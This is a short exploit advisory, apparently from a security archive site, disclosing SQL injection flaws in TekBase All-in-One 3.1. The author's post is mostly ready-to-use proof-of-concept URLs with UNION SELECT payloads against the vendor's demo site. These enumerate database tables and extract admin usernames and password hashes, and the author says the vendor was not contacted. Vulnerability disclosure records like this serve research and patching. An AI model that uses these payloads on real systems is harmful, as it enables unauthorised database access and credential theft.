TekBase All-in-One 3.1 Multiple SQL Injection Vulnerabilities

2009.06.20
Credit: n3wb0ss
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 6.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

############################ # Author: n3wb0ss # Date: 15/06/09 # Contact: n3wboss@Safe-mail.net ############################ # Software: TekBase All-in-One 3.1 # Vendor: tekbase.de # Example: http://demo.tekbase.de/ # Vendor contacted: No # Risk: High ############################ # I found this website on a german board, looking for another script. # Looks to me, like a Gameserver,TS-Server,Whatever-Server-Managing Script. No matter... # It's vuln I found a lot more, but I decided to release just two examples to the public. # U need accessdate, you can get them for demo on tekbase.de (Admin&Customer-Login) ############################ # Here it is (adminaccess needed): # Unfortunately I can't provide any sourcecode of this shit... it's closed source crap. But I think it should be easy to get it :P # Have fun! # POC: http://demo.tekbase.de/admin.php?op=adminSupport&zahl=0&torder=&tcounter=15&ids=99991%27/**/unIon/**/Select/**/1,2,3,4,CONCAT(unhex(hex(TABLE_NAME))),6,7,8,9,10,11/**/frOM/**/INFORMATION_SCHEMA.COLUMNS/**/liMIT/**/-1/* ############################ # Second one( just be a member): # POC: http://demo.tekbase.de/members.php?op=membersBills&y=-2007%27/**/unION/**/SeleCT/**/1,TABLE_NAME,3,4,5,6,7,8/**/FroM/**/INFORMATION_SCHEMA.TABLES/* http://demo.tekbase.de/members.php?op=membersBills&y=-2007%27/**/unION/**/SeleCT/**/1,group_concAT(admin,0x3a,password),3,4,5,6,7,8/**/FroM/**/teklab_admin/* ############################ # As said before, just 2 of many vulns # # # H4ppy Gr33tinGs to the only On3 # ###########################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top